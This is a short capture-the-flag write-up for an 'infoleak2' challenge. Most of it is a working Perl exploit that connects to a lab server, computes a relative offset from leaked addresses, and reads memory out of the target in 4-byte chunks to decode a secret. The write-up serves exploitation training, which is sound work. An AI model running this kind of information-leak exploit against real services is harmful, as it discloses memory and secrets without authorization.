Task:

<span><span>Baby's second infoleak, a tiny bit harder. (https://en.wikipedia.org/wiki/Information_leakage)
Server: 172.31.1.37:1615
Binary: 172.31.0.10/tyro_infoleak2_3a3b043ca422415917e99afdc20618e5</span>
</span>
Approach:

This task was identical to infoleak1 except that absolute addresses were not allowed. Since we used relative addresses for infoleak1, solving this challenge required only trivial modifications to our script.

#!/usr/bin/perl

use IO::Socket::INET;
#172.31.1.37:1615
$sock = IO::Socket::INET->new(PeerAddr => '172.31.1.37',
                              PeerPort => 1615,
                              Proto    => 'tcp');

sleep(1);
my $linebuf;
$sock->send("0\n4\n");
sleep(1);
$sock->recv($linebuf, 4096);
print $linebuf;

my $decoded = '';
if ($linebuf =~ /0x(\S\S\S\S\S\S\S\S).*0x(\S\S\S\S\S\S\S\S)/s) {
    my ( $stack, $string) = ($1, $2);
    my $offset = hex($stack) - hex($string);
    printf "Offset: %08x, %08x, %08x\n", hex($stack), hex($string), $offset;
    my $walker = "";
    foreach my $cur_bucket (0, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40, 44, 48, 52) {
        my $current = sprintf("-%08x\n", ($offset - $cur_bucket));
        print "Sending offset: $cur_bucket\n";
        $sock->send($current);
        sleep(1);
        $sock->recv($linebuf, 4096);
        print "$linebuf";
        if ($linebuf =~ /0x(\S\S\S?\S?\S?\S?\S?\S?)/) {
            my $val = $1;
            my $temp = '';
            while ($val =~ /(..)/g) { $temp .= chr(hex($1))}
            $decoded .= reverse($temp);
        }
    }
}

print "Decoded: $decoded\n";